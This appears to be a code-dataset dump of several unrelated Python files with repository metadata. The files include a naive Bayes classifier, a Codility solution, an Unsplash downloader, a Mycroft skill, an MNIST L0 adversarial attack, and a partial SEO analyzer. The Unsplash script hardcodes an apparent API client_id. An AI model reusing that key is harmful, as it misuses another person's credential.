] | 2 | 2019-01-24T15:06:59.000Z | 2019-01-25T07:34:45.000Z | MachineLearning/Bayes/bayes_classifier.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 1 | 2019-12-23T09:45:11.000Z | 2019-12-23T09:45:11.000Z | MachineLearning/Bayes/bayes_classifier.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 1 | 2019-07-18T14:21:35.000Z | 2019-07-18T14:21:35.000Z | import numpy as np
from sklearn import datasets
from ..utils.dataset_operator import normalize, train_test_split
class NaiveBayes:
def __init__(self):
self.parameters = {}
def fit(self, train_data, train_label):
classes = np.unique(train_label)
for category in classes:
category_images = train_data[np.where(train_label == category)]
category_images_mean = np.mean(category_images, axis=0, keepdims=True)
category_images_variance = np.var(category_images, axis=0, keepdims=True)
parameters = {
"mean": category_images_mean,
"variance": category_images_variance,
"prior": category_images.shape[0] / train_data.shape[0]
}
self.parameters["class_" + str(category)] = parameters
def _gaussian(self, X, classes):
eps = 1e-3
mean = self.parameters["class_" + str(classes)]["mean"]
variance = self.parameters["class_" + str(classes)]["variance"]
numerator = np.exp(-(X - mean) ** 2 / (2 * variance + eps))
denominator = np.sqrt(2 * np.pi * variance + eps)
result = np.sum(np.log(numerator / denominator), axis=1, keepdims=True)
print(result)
return result.T
if __name__ == '__main__':
data = datasets.load_digits()
X = data.data[30:50]
X = normalize(X)
print("train data num:", X.shape[0])
y = data.target[30:50]
print("train data labels:", y)
classifier = NaiveBayes()
classifier.fit(X, y)
classifier._gaussian(X, 1)
| 33.531915 | 85 | 0.617386 |
794631f9b53acc55436aaea406d76339833b7cee | 2,715 | py | Python | prefix_sum/min_avg_two_slice/solution.py | Mendes11/codility_solutions | 036d7e0f14ef626eaa35cb28a30bb98217b46887 | [
"MIT"
] | null | null | null | prefix_sum/min_avg_two_slice/solution.py | Mendes11/codility_solutions | 036d7e0f14ef626eaa35cb28a30bb98217b46887 | [
"MIT"
] | null | null | null | prefix_sum/min_avg_two_slice/solution.py | Mendes11/codility_solutions | 036d7e0f14ef626eaa35cb28a30bb98217b46887 | [
"MIT"
] | null | null | null | from itertools import zip_longest
def solution(A):
"""
A non-empty array A consisting of N integers is given. A pair of integers (P, Q), such that 0 ≤ P < Q < N, is called a slice of array A (notice that the slice contains at least two elements). The average of a slice (P, Q) is the sum of A[P] + A[P + 1] + ... + A[Q] divided by the length of the slice. To be precise, the average equals (A[P] + A[P + 1] + ... + A[Q]) / (Q − P + 1).
For example, array A such that:
A[0] = 4
A[1] = 2
A[2] = 2
A[3] = 5
A[4] = 1
A[5] = 5
A[6] = 8
contains the following example slices:
slice (1, 2), whose average is (2 + 2) / 2 = 2;
slice (3, 4), whose average is (5 + 1) / 2 = 3;
slice (1, 4), whose average is (2 + 2 + 5 + 1) / 4 = 2.5.
The goal is to find the starting position of a slice whose average is minimal.
Write a function:
def solution(A)
that, given a non-empty array A consisting of N integers, returns the starting position of the slice with the minimal average. If there is more than one slice with a minimal average, you should return the smallest starting position of such a slice.
For example, given array A such that:
A[0] = 4
A[1] = 2
A[2] = 2
A[3] = 5
A[4] = 1
A[5] = 5
A[6] = 8
the function should return 1, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [2..100,000];
each element of array A is an integer within the range [−10,000..10,000].
"""
# So, the trick here is that you only need the averages of 2 or 3 steps
# ahead. Any more than this will not be minimal, because it will contain
# the minimal average inside it!
P1 = (prefix_sum_n_mean(A, 2))
P2 = (prefix_sum_n_mean(A, 3))
if not P2:
return 0 # P2 empty means we only have two values
starting_point = -1
min_avg = 100001
for i, (avg_2, avg_3) in enumerate(zip_longest(P1, P2)):
if avg_2 < min_avg:
min_avg = avg_2
starting_point = i
if avg_3 is not None and avg_3 < min_avg:
min_avg = avg_3
starting_point = i
return starting_point
def prefix_sum_n_mean(A, n_values):
"""
Calculates the average of the n_values ahead of each position of list A
:param A: list
:param n_means: number of values to use for each average
:return: list of averages
"""
n = len(A) - (n_values - 1)
P = [10000] * n
for k in range(n):
P[k] = 0
for i in range(n_values):
P[k] += A[k + i]
P[k] /= n_values
return P
| 31.206897 | 384 | 0.590424 |
79463245142582163931f0324587d9e405f6a209 | 1,815 | py | Python | download_user_unsplash_photos.py | Ourselp/unsplash-DigitalFrame | eb092aa4e845e7269bac744d9ba385e1c922cb6f | [
"MIT"
] | null | null | null | download_user_unsplash_photos.py | Ourselp/unsplash-DigitalFrame | eb092aa4e845e7269bac744d9ba385e1c922cb6f | [
"MIT"
] | null | null | null | download_user_unsplash_photos.py | Ourselp/unsplash-DigitalFrame | eb092aa4e845e7269bac744d9ba385e1c922cb6f | [
"MIT"
] | null | null | null | import pyunsplash
import requests
import os
import re
import json
import shutil
#If you have more than 50 photos on your account think about pushing your app for production otherwise you are limited to 50 api call / hour
pu = pyunsplash.PyUnsplash(api_key='YOUR API KEY')
def main():
pageNumber = 10
count = 0
update = False
retrievePic = 0;
while retrievePic < pageNumber:
this_user = pu.user('ourselp', w=100, h=100)
photos = this_user.photos(page=retrievePic, per_page=20) # photos is an instance of class Photos
retrievePic += 1
if photos.entries:
pageNumber += 1
for photo in photos.entries:
count += 1
filename = photo.id + '.jpeg'
linkSourceImg = requests.get(photo.link_download_location + '/?client_id=UVtouHS8slGsncRIUtSKsI5BZdiI2dzCQ0hav80KQ4Y')
data = linkSourceImg.json()
url = data['url']
path = '/home/pi/Desktop/photoframe/unsplash-pictures/%s' % filename
folder = '/home/pi/Desktop/photoframe/unsplash-pictures'
try:
image_file = open(path)
print (" ---> Already have %s" % url)
except IOError:
print (" ---> Downloading %s" % url)
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
f.write(r.content)
update = True
#if it added or removed a photo, update slideshow
if update == True:
os.system("kill $(ps aux | grep '[f]eh' | awk '{print $2}')")
os.system("/home/pi/bin/script_slideshow")
if __name__ == '__main__':
main()
| 36.3 | 140 | 0.558127 |
794632471808bb167f52bd0d2a42e5ac85edd449 | 993 | py | Python | data/earnings_data.py | dutraa/alpaca1 | 103eb3056ae6a561a75eca79b345b41c9e68e97c | [
"MIT"
] | null | null | null | data/earnings_data.py | dutraa/alpaca1 | 103eb3056ae6a561a75eca79b345b41c9e68e97c | [
"MIT"
] | null | null | null | data/earnings_data.py | dutraa/alpaca1 | 103eb3056ae6a561a75eca79b345b41c9e68e97c | [
"MIT"
] | 1 | 2022-03-22T19:18:06.000Z | 2022-03-22T19:18:06.000Z | class EarningsDate(object):
def __init__(
self,
ticker,
companyshortname,
startdatetime,
startdatetimetype,
epsestimate,
epsactual,
epssurprisepct,
gmtOffsetMilliSeconds):
"""Return a new PennyAlgo object."""
self.ticker = ticker
self.companyshortname = companyshortname
self.startdatetime = startdatetime
self.startdatetimetype = startdatetimetype
self.epsestimate = epsestimate
self.epsactual = epsactual
self.epssurprisepct = epssurprisepct
self.gmtOffsetMilliSeconds = gmtOffsetMilliSeconds
def __str__(self):
# Override to print a readable string presentation of your object
# below is a dynamic way of doing this without explicity constructing the string manually
return ', '.join(['{key}={value}'.format(key=key, value=self.__dict__.get(key)) for key in self.__dict__])
| 34.241379 | 115 | 0.635448 |
7946339a7e7552fd8c447056aafd0e2939dcc5b6 | 6,488 | py | Python | L0_attack.py | abahram77/mnistChallenge | 94dca5a6c54b16cac44f1a429d96a5182be64a31 | [
"MIT"
] | null | null | null | L0_attack.py | abahram77/mnistChallenge | 94dca5a6c54b16cac44f1a429d96a5182be64a31 | [
"MIT"
] | null | null | null | L0_attack.py | abahram77/mnistChallenge | 94dca5a6c54b16cac44f1a429d96a5182be64a31 | [
"MIT"
] | null | null | null | """
Implementation of attack methods. Running this file as a program will
apply the attack to the model specified by the config file and store
the examples in an .npy file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import os
import tensorflow as tf
import numpy as np
import scipy.misc
from PIL import Image
from matplotlib import pyplot
class L0Attack:
def __init__(self, model, epsilon, threshold, a, random_start, loss_func):
"""Attack parameter initialization. The attack performs k steps of
size a, while always staying within epsilon from the initial
point."""
self.model = model
self.epsilon = epsilon
self.threshold = threshold
self.a = a
self.rand = random_start
if loss_func == 'xent':
loss = model.xent
elif loss_func == 'cw':
label_mask = tf.one_hot(model.y_input,
10,
on_value=1.0,
off_value=0.0,
dtype=tf.float32)
correct_logit = tf.reduce_sum(label_mask * model.pre_softmax, axis=1)
wrong_logit = tf.reduce_max((1-label_mask) * model.pre_softmax
- 1e4*label_mask, axis=1)
loss = -tf.nn.relu(correct_logit - wrong_logit + 50)
else:
print('Unknown loss function. Defaulting to cross-entropy')
loss = model.xent
self.grad = tf.gradients(loss, model.x_input)[0]
def perturb(self, x_nat, y, sess):
"""Given a set of examples (x_nat, y), returns a set of adversarial
examples within epsilon of x_nat in l_infinity norm."""
# if self.rand:
# x = x_nat + np.random.uniform(-self.epsilon, self.epsilon, x_nat.shape)
# x = np.clip(x, 0, 1) # ensure valid pixel range
# else:
# x = np.copy(x_nat)
x=np.copy(x_nat)
# first_image = x[0]
# first_image = np.array(first_image, dtype='float')
# pixels = first_image.reshape((28, 28))
# pyplot.imshow(pixels, cmap='gray')
# for k in range (len(x)):
# first_image = x[k]
# first_image = np.array(first_image, dtype='float')
# pixels = first_image.reshape((28, 28))
#
# # scipy.misc.imsave('/pics'+'/pic'+str(k)+'.jpg', pixels)
#
#
#
# # convert values to 0 - 255 int8 format
# formatted = (pixels * 255 / np.max(pixels)).astype('uint8')
# img = Image.fromarray(formatted)
# path = 'C:/Users/abahram77/PycharmProjects/mnist_challenge/mnist_challenge/L0_pics_nonPerturbed/'
# img.save(path+'pic'+str(k)+'.png')
listOfSets=[set() for i in range(200)]
listOfSets2=[set() for i in range(200)]
for i in range(self.threshold):
grad = sess.run(self.grad, feed_dict={self.model.x_input: x,
self.model.y_input: y})
grad2 = grad.tolist()
for j in range(len(x)):
max_grad=np.where(grad[j] == np.amax(grad[j]))
index = max_grad[0][0]
# print(grad[j][index])
grad2=grad.tolist()
while (index in listOfSets[j]):
del grad2[j][index]
grad2=np.asanyarray(grad2)
max_grad = np.where(grad2[j] == np.amax(grad2[j]))
index = max_grad[0][0]
listOfSets[j].add(index)
x[j][index] =1
min_grad = np.where(grad[j] == np.amin(grad[j]))
index1 = min_grad[0][0]
grad2 = grad.tolist()
while (index1 in listOfSets2[j]):
del grad2[j][index1]
grad2 = np.asanyarray(grad2)
min_grad = np.where(grad2[j] == np.amin(grad2[j]))
index1 = min_grad[0][0]
listOfSets2[j].add(index1)
# print(grad[j][index1])
x[j][index1]=0
# print(x[j][index])
# print(x[j])
# for k in range (len(x)):
# first_image = x[k]
# first_image = np.array(first_image, dtype='float')
# pixels = first_image.reshape((28, 28))
#
# # scipy.misc.imsave('/pics'+'/pic'+str(k)+'.jpg', pixels)
#
#
#
# # convert values to 0 - 255 int8 format
# formatted = (pixels * 255 / np.max(pixels)).astype('uint8')
# img = Image.fromarray(formatted)
# path = 'C:/Users/abahram77/PycharmProjects/mnist_challenge/mnist_challenge/L0_pics_perturbed/'
# img.save(path+'pic'+str(k)+'.png')
#
# #x += self.a * np.sign(grad)
#
#
# #x = np.clip(x, x_nat - self.epsilon, x_nat + self.epsilon)
# for i in range(0,len(listOfSets)):
# listOfSets[i]=len(listOfSets[i])
# listOfSets2[i]=len(listOfSets2[i])
# print(listOfSets)
# print(listOfSets2)
# print()
x = np.clip(x, 0, 1) # ensure valid pixel range
return x
if __name__ == '__main__':
import json
import sys
import math
from tensorflow.examples.tutorials.mnist import input_data
from model import Model
with open('config.json') as config_file:
config = json.load(config_file)
model_file = tf.train.latest_checkpoint(config['model_dir2'])
if model_file is None:
print('No model found')
sys.exit()
model = Model()
attack = L0Attack(model,
config['epsilon'],
config['threshold'],
config['a'],
config['random_start'],
config['loss_func'])
saver = tf.train.Saver()
mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
with tf.Session() as sess:
# Restore the checkpoint
saver.restore(sess, model_file)
# Iterate over the samples batch-by-batch
num_eval_examples = config['num_eval_examples']
eval_batch_size = config['eval_batch_size']
num_batches = int(math.ceil(num_eval_examples / eval_batch_size))
num_batches=1
x_adv = [] # adv accumulator
print('Iterating over {} batches'.format(num_batches))
for ibatch in range(num_batches):
bstart = ibatch * eval_batch_size
bend = min(bstart + eval_batch_size, num_eval_examples)
print('batch size: {}'.format(bend - bstart))
x_batch = mnist.test.images[bstart:bend, :]
y_batch = mnist.test.labels[bstart:bend]
x_batch_adv = attack.perturb(x_batch, y_batch, sess)
x_adv.append(x_batch_adv)
print('Storing examples')
path = config['store_adv_L0_path']
x_adv = np.concatenate(x_adv, axis=0)
np.save(path, x_adv)
print('Examples stored in {}'.format(path))
| 27.965517 | 105 | 0.60373 |
794633e9a3d0f3ebe147a8797f92cf019cfe841a | 6,102 | py | Python | __init__.py | MycroftAI/skill-naptime | 529ef9df1df29c9518ed5ddf452ecf402340672e | [
"Apache-2.0"
] | 2 | 2018-02-24T08:20:10.000Z | 2018-11-19T21:12:27.000Z | __init__.py | MycroftAI/skill-naptime | 529ef9df1df29c9518ed5ddf452ecf402340672e | [
"Apache-2.0"
] | 19 | 2017-12-11T15:54:43.000Z | 2022-03-27T23:51:48.000Z | __init__.py | MycroftAI/skill-naptime | 529ef9df1df29c9518ed5ddf452ecf402340672e | [
"Apache-2.0"
] | 26 | 2017-05-02T22:52:27.000Z | 2021-09-06T12:46:21.000Z | # Copyright 2017, Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from mycroft import AdaptIntent, MycroftSkill, intent_handler
from mycroft.audio import wait_while_speaking
from mycroft.configuration.config import Configuration
from mycroft.messagebus.message import Message
class NapTimeSkill(MycroftSkill):
"""Skill to handle mycroft speech client listener sleeping."""
def __init__(self) -> None:
"""Initialize NapTimeSkill"""
super().__init__()
self.started_by_skill = False
self.sleeping = False
self.old_brightness = 30
self.disabled_confirm_listening = False
def initialize(self) -> None:
"""Perform final initialization once Skill class has loaded."""
self.add_event('mycroft.awoken', self.handle_awoken)
self.platform = self.config_core.get(
"enclosure").get("platform", "unknown")
self.wake_word = Configuration.get()['listener']['wake_word']
@intent_handler(AdaptIntent("NapTimeIntent").require("SleepCommand"))
def handle_go_to_sleep(self, _) -> None:
"""Sends a message to the speech client putting the listener to sleep.
If the user has been told about the waking up process five times
already, it sends a shorter message.
"""
count = self.settings.get('Wake up count', 0)
count += 1
self.settings['Wake up count'] = count
if count <= 5:
self.speak_dialog('going.to.sleep', {'wake_word': self.wake_word})
else:
self.speak_dialog('going.to.sleep.short')
self.perform_sleep()
def handle_awoken(self, _) -> None:
"""Handler for the mycroft.awoken message
The message is sent when the listener hears 'Hey Mycroft, Wake Up',
this handles the user interaction upon wake up.
"""
started_by_skill = self.started_by_skill
self.perform_awaken()
if started_by_skill:
# Announce that the unit is awake
self.speak_dialog("i.am.awake")
self.display_waking_face()
def display_sleep_face(self) -> None:
"""Display the sleeping face depending on the platform."""
if self.gui.connected:
self.gui.show_page("resting.qml", override_idle=True)
elif self.platform == "mycroft_mark_1":
self.display_sleep_animation()
def display_sleep_animation(self) -> None:
"""Dim and look downward to 'go to sleep'."""
# TODO: Get current brightness from somewhere
self.old_brightness = 30
for i in range(0, (self.old_brightness - 10) // 2):
self.enclosure.eyes_brightness(self.old_brightness - i * 2)
time.sleep(0.15)
self.enclosure.eyes_look("d")
def display_waking_face(self) -> None:
"""Display the waking face depending on the platform."""
if self.gui.connected:
self.gui.remove_page("resting.qml")
self.gui.show_page("awake.qml", override_idle=5)
# TODO Screen not reverting after the specified 5 seconds.
# The following 2 lines shouldn't be needed. Remove when fixed.
time.sleep(5)
self.gui.release()
elif self.platform == 'mycroft_mark_1':
self.display_wake_up_animation()
def display_wake_up_animation(self) -> None:
"""Mild animation to come out of sleep from voice command.
Pop open eyes and wait a sec.
"""
self.enclosure.eyes_reset()
time.sleep(1)
self.enclosure.eyes_blink('b')
time.sleep(1)
# brighten the rest of the way
self.enclosure.eyes_brightness(self.old_brightness)
def perform_awaken(self) -> None:
"""Perform actions to wake system up."""
if self.platform != "unknown":
self.bus.emit(Message('mycroft.volume.unmute',
data={"speak_message": False}))
elif self.disabled_confirm_listening:
self.enable_confirm_listening()
self.sleeping = False
self.started_by_skill = False
def perform_sleep(self) -> None:
"""Perform actions to put system to sleep."""
self.bus.emit(Message('recognizer_loop:sleep'))
self.sleeping = True
self.started_by_skill = True
# TODO - Work out why this is here...
wait_while_speaking()
time.sleep(2)
wait_while_speaking()
self.display_sleep_face()
if self.platform != "unknown":
self.bus.emit(Message('mycroft.volume.mute',
data={"speak_message": False}))
elif self.config_core['confirm_listening']:
self.disable_confirm_listening()
def disable_confirm_listening(self) -> None:
"""Patch active mycroft configuration to disable listening beep."""
msg = Message('configuration.patch',
data={'config': {'confirm_listening': False}}
)
self.bus.emit(msg)
self.disabled_confirm_listening = True
self.log.info('Disabled listening chirp')
def enable_confirm_listening(self) -> None:
"""Patch active mycroft configuration to enable listening beep."""
msg = Message('configuration.patch',
data={'config': {'confirm_listening': True}}
)
self.bus.emit(msg)
self.disabled_confirm_listening = False
self.log.info('Enabled listening chirp again')
def create_skill():
return NapTimeSkill()
| 38.1375 | 78 | 0.635693 |
79463417774c03aa13964320dbbe17d00789245e | 2,128 | py | Python | tools_of_curiosity_app/t4c/views.py | Innovators-for-Purpose/tools-of-curiosity | 4fa02c10f8ce9e700dd0275ee7d5a46494638c5b | [
"MIT"
] | null | null | null | tools_of_curiosity_app/t4c/views.py | Innovators-for-Purpose/tools-of-curiosity | 4fa02c10f8ce9e700dd0275ee7d5a46494638c5b | [
"MIT"
] | 1 | 2021-07-28T15:26:58.000Z | 2021-07-28T15:26:58.000Z | tools_of_curiosity_app/t4c/views.py | Innovators-for-Purpose/tools-of-curiosity | 4fa02c10f8ce9e700dd0275ee7d5a46494638c5b | [
"MIT"
] | 6 | 2021-07-06T17:37:44.000Z | 2021-07-07T13:25:06.000Z | from django.shortcuts import render
from django.http import HttpResponse
from pprint import pprint
def index(request):
print("t4c/views.py @ index()")
pprint(request)
context = {}
return render(request, "t4c/index.html", context)
def aframedemo(request):
print("t4c/views.py @ aframedemo()")
pprint(request)
context = {}
return render(request, "t4c/aframedemo.html", context)
def Angel(request):
print("t4c/views.py @ Angel()")
pprint(request)
context = {}
return render(request, "t4c/Angel.html", context)
def minigame2(request):
print("t4c/views.py @ minigame2()")
pprint(request)
context = {}
return render(request, "t4c/minigame2.html", context)
def minigame3(request):
print("t4c/views.py @ minigame3()")
pprint(request)
context = {}
return render(request, "t4c/minigame3.html", context)
def minigame4(request):
print("t4c/views.py @ minigame4()")
pprint(request)
context = {}
return render(request, "t4c/minigame4.html", context)
def designsprint(request):
print("t4c/views.py @ designsprint()")
pprint(request)
context = {}
return render(request, "t4c/designsprint.html", context)
def designsprint2(request):
print("t4c/views.py @ designsprint2()")
pprint(request)
context = {}
return render(request, "t4c/designsprint2.html", context)
def OBSOLETEindex(request):
return HttpResponse("Hello, world. You're at the t4c index.")
def default(request):
print("t4c/views.py @ default()")
pprint(request)
context = {}
return render(request, "t4c/default.html", context)
def Egypt(request):
print("t4c/views.py @ Egypt()")
pprint(request)
context = {}
return render(request, "t4c/Egypt.html", context)
def cricket(request):
print("t4c/views.py @ cricket()")
pprint(request)
context = {}
return render(request, "t4c/cricket.html", context)
def level1(request):
print("t4c/views.py @ level1()")
pprint(request)
context = {}
return render(request, "t4c/level1.html", context)
| 27.282051 | 65 | 0.648966 |
79463505f607536c52b371760d9c549454553c6a | 707 | py | Python | tests/test_dbf.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 23 | 2017-05-25T01:08:58.000Z | 2019-06-22T19:35:50.000Z | tests/test_dbf.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 153 | 2020-10-07T13:42:08.000Z | 2022-03-18T08:11:37.000Z | tests/test_dbf.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 9 | 2020-10-22T08:54:20.000Z | 2022-02-01T10:23:22.000Z | # -*- coding: utf-8 -*-
from .support import TestCase
class DBFIngestorTest(TestCase):
def test_simple_dbf(self):
fixture_path, entity = self.fixture("PAK_adm1.dbf")
self.manager.ingest(fixture_path, entity)
self.assertEqual(entity.first("processingStatus"), self.manager.STATUS_SUCCESS)
entities = self.get_emitted()
table = entities[0]
self.assertEqual(len(entities), 1)
self.assertEqual(entity.schema.name, "Table")
self.assertTrue(entity.has("csvHash"))
self.assertEqual(int(entity.first("rowCount")), 9)
self.assertIn("Azad Kashmir", table.get("indexText"))
self.assertIn("Pakistan", table.get("indexText"))
| 39.277778 | 87 | 0.66761 |
794635b18ba1eb1151fc872d910da8b5bbcbc676 | 1,322 | py | Python | rclpy/topics/minimal_subscriber/setup.py | rpaaron/examples | 1877840376ddf2fde4e553333e282ee7034c049a | [
"Apache-2.0"
] | null | null | null | rclpy/topics/minimal_subscriber/setup.py | rpaaron/examples | 1877840376ddf2fde4e553333e282ee7034c049a | [
"Apache-2.0"
] | null | null | null | rclpy/topics/minimal_subscriber/setup.py | rpaaron/examples | 1877840376ddf2fde4e553333e282ee7034c049a | [
"Apache-2.0"
] | 1 | 2021-03-06T10:13:26.000Z | 2021-03-06T10:13:26.000Z | from setuptools import setup
package_name = 'examples_rclpy_minimal_subscriber'
setup(
name=package_name,
version='0.10.2',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
author='Mikael Arguedas',
author_email='[email protected]',
maintainer='Mikael Arguedas',
maintainer_email='[email protected]',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description='Examples of minimal subscribers using rclpy.',
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'subscriber_old_school ='
' examples_rclpy_minimal_subscriber.subscriber_old_school:main',
'subscriber_lambda = examples_rclpy_minimal_subscriber.subscriber_lambda:main',
'subscriber_member_function ='
' examples_rclpy_minimal_subscriber.subscriber_member_function:main',
],
},
)
| 33.05 | 91 | 0.658094 |
794635c63ebcae4296a49130b6dd20586d675944 | 3,185 | py | Python | src/ui_custom.py | vincentX3/TrainingRecords | 1863761356887b0d20448fc46cf57d00dbba77b2 | [
"MIT"
] | null | null | null | src/ui_custom.py | vincentX3/TrainingRecords | 1863761356887b0d20448fc46cf57d00dbba77b2 | [
"MIT"
] | null | null | null | src/ui_custom.py | vincentX3/TrainingRecords | 1863761356887b0d20448fc46cf57d00dbba77b2 | [
"MIT"
] | null | null | null | import sys
from PyQt5 import QtGui, QtWidgets, QtCore
from PyQt5.QtCore import QSize
from PyQt5.QtWidgets import QListWidgetItem, QWidget, QLabel, QLineEdit, QPushButton, QHBoxLayout, QApplication, \
QListWidget, QSpacerItem, QSizePolicy
from ui_macro import *
class TodoQListWidgetItem(QListWidgetItem):
def __init__(self, content, num):
super().__init__()
self.widget = QWidget()
# decoration
self.label_arrow = QLabel()
self.label_arrow.setText("")
self.label_arrow.setPixmap(QtGui.QPixmap("../res/arrow.png").scaled(24, 24))
# display planning content
self.label_content = QLabel()
self.label_content.setText(content)
# display planning num.scaled(16,16
self.lineEdit_num = QLineEdit()
# self.lineEdit_num.setAlignment(QtCore.Qt.AlignCenter)
str_num = num.split(".")[0]
width = self.lineEdit_num.fontMetrics().width(str_num)
self.lineEdit_num.setMaximumWidth(width*3)
self.lineEdit_num.setText(str_num)
# button
self.pushButton_done = QPushButton()
self.pushButton_done.setText("")
icon_done = QtGui.QIcon()
icon_done.addPixmap(QtGui.QPixmap("../res/done.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_done.setIcon(icon_done)
self.pushButton_delete = QPushButton()
self.pushButton_delete.setText("")
icon_delete = QtGui.QIcon()
icon_delete.addPixmap(QtGui.QPixmap("../res/delete.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_delete.setIcon(icon_delete)
self.hbox = QHBoxLayout()
self.hbox.addWidget(self.label_arrow)
self.hbox.addWidget(self.label_content)
self.hbox.addWidget(self.lineEdit_num)
self.hbox.addStretch(1)
self.hbox.addWidget(self.pushButton_done)
self.hbox.addWidget(self.pushButton_delete)
# 设置widget的布局
self.widget.setLayout(self.hbox)
# self.widget.setSizePolicy(QSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding))
# 设置自定义的QListWidgetItem的sizeHint,不然无法显示
self.setSizeHint(self.widget.sizeHint())
# --- custom theme ---
# since I haven't find a way to change custom QListWidgetIem style in styleshee
widget_qss = """
margin-left: 14px; margin-right: 14px; margin-top: 7px; margin-bottom: 7px;
background-color: white;
border-radius: 10px;
"""
self.widget.setStyleSheet(widget_qss)
button_qss = """
margin: 4px;
padding: 8px;
"""
self.pushButton_delete.setStyleSheet(button_qss)
self.pushButton_done.setStyleSheet(button_qss)
label_qss = """
font-size: 30px;
font: bold;
"""
self.label_content.setStyleSheet(label_qss)
lineEdit_qss = """
margin: 0px;
border-radius: 0px;
"""
self.lineEdit_num.setStyleSheet(lineEdit_qss)
| 40.833333 | 114 | 0.616327 |
794635f2bdf0efaf87e79d5a39d22b158b83ce97 | 14,555 | py | Python | seoanalyzer_two/page.py | pythonscriptkiddie/python-seo-analyzer | e476cdd3ef5332657375b76578f19be315a2440f | [
"BSD-3-Clause"
] | null | null | null | seoanalyzer_two/page.py | pythonscriptkiddie/python-seo-analyzer | e476cdd3ef5332657375b76578f19be315a2440f | [
"BSD-3-Clause"
] | null | null | null | seoanalyzer_two/page.py | pythonscriptkiddie/python-seo-analyzer | e476cdd3ef5332657375b76578f19be315a2440f | [
"BSD-3-Clause"
] | null | null | null | import hashlib
import json
import os
import re
from bs4 import BeautifulSoup
from collections import Counter
from string import punctuation
from urllib.parse import urlsplit
from urllib3.exceptions import HTTPError
from seoanalyzer.http import http
from seoanalyzer.stemmer import stem
# This list of English stop words is taken from the "Glasgow Information
# Retrieval Group". The original list can be found at
# http://ir.dcs.gla.ac.uk/resources/linguistic_utils/stop_words
ENGLISH_STOP_WORDS = frozenset([
"a", "about", "above", "across", "after", "afterwards", "again", "against",
"all", "almost", "alone", "along", "already", "also", "although", "always",
"am", "among", "amongst", "amoungst", "amount", "an", "and", "another",
"any", "anyhow", "anyone", "anything", "anyway", "anywhere", "are",
"around", "as", "at", "back", "be", "became", "because", "become",
"becomes", "becoming", "been", "before", "beforehand", "behind", "being",
"below", "beside", "besides", "between", "beyond", "bill", "both",
"bottom", "but", "by", "call", "can", "cannot", "cant", "co", "con",
"could", "couldnt", "cry", "de", "describe", "detail", "do", "done",
"down", "due", "during", "each", "eg", "eight", "either", "eleven", "else",
"elsewhere", "empty", "enough", "etc", "even", "ever", "every", "everyone",
"everything", "everywhere", "except", "few", "fifteen", "fify", "fill",
"find", "fire", "first", "five", "for", "former", "formerly", "forty",
"found", "four", "from", "front", "full", "further", "get", "give", "go",
"had", "has", "hasnt", "have", "he", "hence", "her", "here", "hereafter",
"hereby", "herein", "hereupon", "hers", "herself", "him", "himself", "his",
"how", "however", "hundred", "i", "ie", "if", "in", "inc", "indeed",
"interest", "into", "is", "it", "its", "itself", "keep", "last", "latter",
"latterly", "least", "less", "ltd", "made", "many", "may", "me",
"meanwhile", "might", "mill", "mine", "more", "moreover", "most", "mostly",
"move", "much", "must", "my", "myself", "name", "namely", "neither",
"never", "nevertheless", "next", "nine", "no", "nobody", "none", "noone",
"nor", "not", "nothing", "now", "nowhere", "of", "off", "often", "on",
"once", "one", "only", "onto", "or", "other", "others", "otherwise", "our",
"ours", "ourselves", "out", "over", "own", "part", "per", "perhaps",
"please", "put", "rather", "re", "same", "see", "seem", "seemed",
"seeming", "seems", "serious", "several", "she", "should", "show", "side",
"since", "sincere", "six", "sixty", "so", "some", "somehow", "someone",
"something", "sometime", "sometimes", "somewhere", "still", "such",
"system", "take", "ten", "than", "that", "the", "their", "them",
"themselves", "then", "thence", "there", "thereafter", "thereby",
"therefore", "therein", "thereupon", "these", "they",
"third", "this", "those", "though", "three", "through", "throughout",
"thru", "thus", "to", "together", "too", "top", "toward", "towards",
"twelve", "twenty", "two", "un", "under", "until", "up", "upon", "us",
"very", "via", "was", "we", "well", "were", "what", "whatever", "when",
"whence", "whenever", "where", "whereafter", "whereas", "whereby",
"wherein", "whereupon", "wherever", "whether", "which", "while", "whither",
"who", "whoever", "whole", "whom", "whose", "why", "will", "with",
"within", "without", "would", "yet", "you", "your", "yours", "yourself",
"yourselves"])
TOKEN_REGEX = re.compile(r'(?u)\b\w\w+\b')
IMAGE_EXTENSIONS = set(['.img', '.png', '.jpg', '.jpeg', '.gif', '.bmp', '.svg', '.webp', '.avif',])
class Page():
"""
Container for each page and the core analyzer.
"""
def __init__(self, url='', base_domain=''):
"""
Variables go here, *not* outside of __init__
"""
self.base_domain = urlsplit(base_domain)
self.parsed_url = urlsplit(url)
self.url = url
self.title = ''
self.description = ''
self.keywords = {}
self.warnings = []
